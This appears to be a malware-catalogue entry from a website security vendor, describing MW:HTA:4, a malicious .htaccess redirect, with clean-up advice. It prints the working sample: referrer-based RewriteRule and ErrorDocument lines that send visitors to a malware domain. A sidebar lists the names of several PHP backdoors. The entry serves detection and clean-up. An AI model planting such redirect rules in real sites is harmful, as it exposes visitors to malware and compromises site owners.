Malware Entries

Malware entry: MW:HTA:4

Description:

This attack uses .htaccess to redirect users to a site serving malware (or spam).

Loads malware from:

http://redrt.org.in
And other domains.

Affecting:

Any type of web site (no specific target).

Clean up and details:

Remove offendin code from .htaccess.

Links:

http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html

Malware sample:

.. RewriteCond %{HTTP_REFERER} .*flickr.* [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://redrt.org.in/in.cgi?4&parameter=0510 [R,L] ErrorDocument 400 http://redrt.org.in/in.cgi?4&parameter=0510 ErrorDocument 401 http://redrt.org.in/in.cgi?4&parameter=0510 ErrorDocument 403 http://redrt.org.in/in.cgi?4&parameter=0510 ErrorDocument 404 http://redrt.org.in/in.cgi?4&parameter=0510

Malware Entries

Malware entry: MW:HTA:4

Malware Entries

Subscribe to RSS

Backdoor: PHP:PREG_REPLACE:EVAL

Backdoor: PHP:C99:045

Backdoor: PHP:R57:01

Backdoor: PHP:EVAL:GZINFLATE:B64

Backdoor: PHP:GENERIC:07

Backdoor: PHP:WEBSHELL:03

Backdoor: PHP:Filesman:02

Malware entry: MW:JS:6525

Malware entry: MW:JS:160

Malware entry: MW:IFRAME:HD567

Malware entry: MW:JS:62313

Malware entry: MW:JS:69693

Malware entry: MW:ANOMALY:SP8

PHP Error: Eval code errors

Malware entry: MW:IFRAME:HD564

Malware entry: MW:JS:IFRAME213

Malware entry: MW:JS:2370

Malware entry: MW:JS:62312

Malware entry: MW:JS:3029

Malware entry: MW:BACK:451

Research Blog

Tools